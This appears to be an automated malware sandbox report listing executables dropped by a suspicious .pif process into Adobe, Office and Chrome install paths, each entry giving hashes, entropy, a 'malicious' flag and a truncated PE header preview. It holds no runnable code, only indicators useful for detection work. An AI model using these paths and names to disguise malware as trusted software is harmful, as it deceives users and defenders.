                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:frZ23AbsK6Ro022JjL2WEiVqJZuD527BWG:TJADmmxL2WEoCZuVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:79091BE63EA17AF1A4822E59023A59C7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:33D5B8E5DFC5299DE604F38DEEE6C1C2A2D3E2B7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DC33A76B351D74C0FB698F73C9816F6A5C36C274A60717F6AC0B5CB176B356DC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C001805ED7A498AF3A72D48381C6D5BCB01AA2AD24CDF41A3C23B1D1EC28D148537BE298A631EE660490ECCAFDD9073C49829E0C0A339538AC7D3257C41326F2
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......w0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.20495162518338
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3frYY42wd7hlOw9fpkEE64XsqjnhMgeiCl7G0nehbGZpbD:uz9xrSrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7408E1C1232C0F0BC4D5C6AA26972C15
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:88D4F985068B3738B69C91918C39105244598B0A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FAEC4452BFED70419AB16D2C52C998C2AFE3297B00D72B0B884B0824A8D7DDAC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BCD606F2BC0E0D77F50BDE63A8D92540F37CCA3503F4A781C8237D3E7C1951D9069AF00D074D8A1161501E46EC25DEACC3207823F8C653D86DCE7D4FBF73D11C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......E.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.272973369092675
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:CwkNKiZ+R2GGNUbTF5gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:CzNKUE5gsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:32AE1F52DA9F9708A9CD61D0B087A5D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6161EC8960CA439235CAA85220C773F5D8377C78
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:49FFD2FCED49DDE2A3710051498A36601F938D49AECC805CD8350C9946DBE944
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9B460D10DB1F905FD41D2767E2CD4C5670B7BB6904253C6A62BA92D2724C138BB5B9BAD98763FE1CE84374B380344AB24CCD1F14C2A696B2F4C0FB52C179D7C3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......|'.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.57434686360605
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:vALuzDKnxCp3JKNrPJzruaI6HMaJTtGb9D527BWG:4aGg3cFPIaI6HMaJTtGb9VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D08A6557D0C4528DBC827A8386254A4E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C2DAE11A9BB95BB3B044EE2C86EC2554D10AD35C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B881E1B90610F242FE9A3320627EE36F19F0EB6003AF2407D041200F37D744F6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A10C22CFAA71256BAAD5526A10CCB17AE67EC65F4BA18E397A93D30B90CC0FCC8D51182B009EA20DB20ABE19CA7E482FADE6C46C10A4D8BE2FBC0D3931E31111
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.356088035257598
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:0Xr/SVMxWDsqjnhMgeiCl7G0nehbGZpbD:01xuDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:353B72DAF37C02E1EC5145020F3C50D6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6832F442F3769F1502AD11E80B8B73B921057786
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7995AEEC39D9741620B6BFF90150AD564D06B348D9B241B60A68C5E27BBA14A9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:68B32AEB051F2CFAA4D6AA9BD134B5D98E16BA84AE07781C344092472955FC82E64F4FF47BF2BB3467EE192DBF91285B00A4DF0CE85A533105990A04C7E6F1B2
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P......n............ ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.248640082863847
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:NhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOxVQBWG:NhRCpGpMJMrbp8JjpNdNlc5TB
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:45EA03955F9B250EFD5F8B81C476E5ED
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A76ED251A07C37E8E7C732EA974D7C5B5329DFB3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:037DFA38D50B095ED331EE4596DDA636292FE9771A16A4DAEC416A2F671057BF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4E64590676C68029391EA1E60293B546598AF83FDD0AF28EC9FA5E2E806A9F5959D600E294A969D9560C3655031C88ACAF96A5EB23A660809D11081F12A449F3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................^..... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.789045138742076
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:183pZ3kd0CuEeN0LUmRXzYs65mpDmg27RnWGj:lKuUQY15yD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:64F84D7BEF6884DC6980F74032B0CF3E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:803374ACB237C7C798BEFFBFE313CF23F53AF5C4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AF056469FF8B0A5ACDEC07A200B37FB753C0FD5F06CCFAA6DB05EE9306371BCF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:355614226701644AA6E2162631C8B965AA50E8BB19DFF02B010CBD6C8504276A31D60D47592C4C89269174777691E04E7F63D59721B4ACB33A8F2ABC56F40251
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.670851954290265
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:HErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mk:xA4oGlcR+glEdOPKzgVZnD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F156C357D283F7726FCAA061614DA7B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:883A6F39718F7ACCD162D528F5BC9E8F7E342BB4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FF398BE26F6BC6FCBCD907FABDC77A702060407E8E51FE7A38CAC2544828524A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D471B62B84815984C47AED1CAEB52337E75990021FBF9B29173035724EBF9982C1E5ED3AF8A6EDD54CDC4D31EDB6DE9F32965A22935575A77456209EE378AA60
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....30L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.829784965153326
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:I8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKv:Tv2gM+qwXLg7pPgw/DSZH5D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:63B505F449C7130069E2719C7FCBC806
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D06EB7C4E37CAAC1E72F0922E73EA5B92D0DC548
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B2FEB246788781B7F9BD56D39155F3E18B88672D12A27BCBA1BCE93D3DD3DF70
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5D0338229E9AF180129CC7F12789FF444A0515D7DF75184608A33042D2C68491A5B5B9A978A3074358E39A7B3D1172119CE416D3B6256C66AF7F17663DC4CF7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......4K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.829781910809205
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:K8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKv:Jv2gM+qwXLg7pPgw/DSZH5D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EB262C444FD961CE775323DE1E7BA0CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4D570F05B0F9DCCD27D80CB6BBE10EB8C4B0DAA2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:94F5CE6C22D83AA4C6C27B46FA0178D1D947198AEF08707CAEBC2C4F8F2A2F01
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:40126FA7DEC64D87C77F0D11118180194E54D0FE45548BA438E8789F581FBCC95267DA9C5D923AFB193E1BCEA8EB7E65259FF4DEE912F98794A8619CD9625EF1
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......BK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.953602705830343
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:+tjqL8fH+8aUbp8D/8+xyWAGsqjnhMgeiCl7G0nehbGZpbD:2jKK+81FI/8zQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3CD3460C7BD3A99C225F97C294857584
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BFE96DBAED0314924BC9ABBB37D34BD5664A3F16
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:54A69CB38CE8B06A89ABE193FE3EC68E5B2F09299275A778312C3FF05BD45D1E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:15ACEF88943BEF3F0044899A2CDE3807C4AA82D74B4BD1CC4CF4F4149C16E390122B45072E9F90F6A26AB3C9F60FA402D26BC62E8448739914DC655219B01897
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......i!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.032413735389275
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:XAMsOu3JfCIGnZuTodRFYKBrFDbWpaDmg27RnWGj:XAMa38ZuTSnD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:DF213DBB6B8EC10F7AE894C79BF55BA4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C311470BF9DC5397C1C29D1FD3F1ADE24E67D46D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7681BE65A2EA97FF732C8EC7B335A5B18A1CFB7B8227937F178F513485DF6A07
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D92CD7FB6CFFFC36D340F21F4C99E8638A6F0D4E6B15DF4450281D515FFB38BBBB44AF999A830465744C12F4FCA7AED3636902C20E9228F07047A772892CA84E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.104373527701408
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:nwbK7tnhD4aH6wD2Krx5NgOOagQE8JKsqjnhMgeiCl7G0nehbGZpbD:nSK7Fhslq2EPfOGEbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:326373D80EFA24ECEFAD6AEC58EE0D11
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:21B0BEE77F83C4FA28337036E8696F4412F09688
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:56046DFBE4F2D9DBCEDBD80C6C1FFF17402B7AB18147CD0FBDE36B31B6288C19
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ADA276B3A934576DE992C9233C67598CD23903510F2D2795239D5AC3225F0D70320E2216E3A0984CB606C1E4AF0D15DF8BD802668B8A5B7EF46B1E3B461DDD22
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.....................................a.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.158103211126095
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5KI7Twj5KDHxJ1FxyD+/wsG18bbQasqjnhMgeiCl7G0nehbGZpbD:5v7e0j31mD+/wDGbVDmg27RnWGj
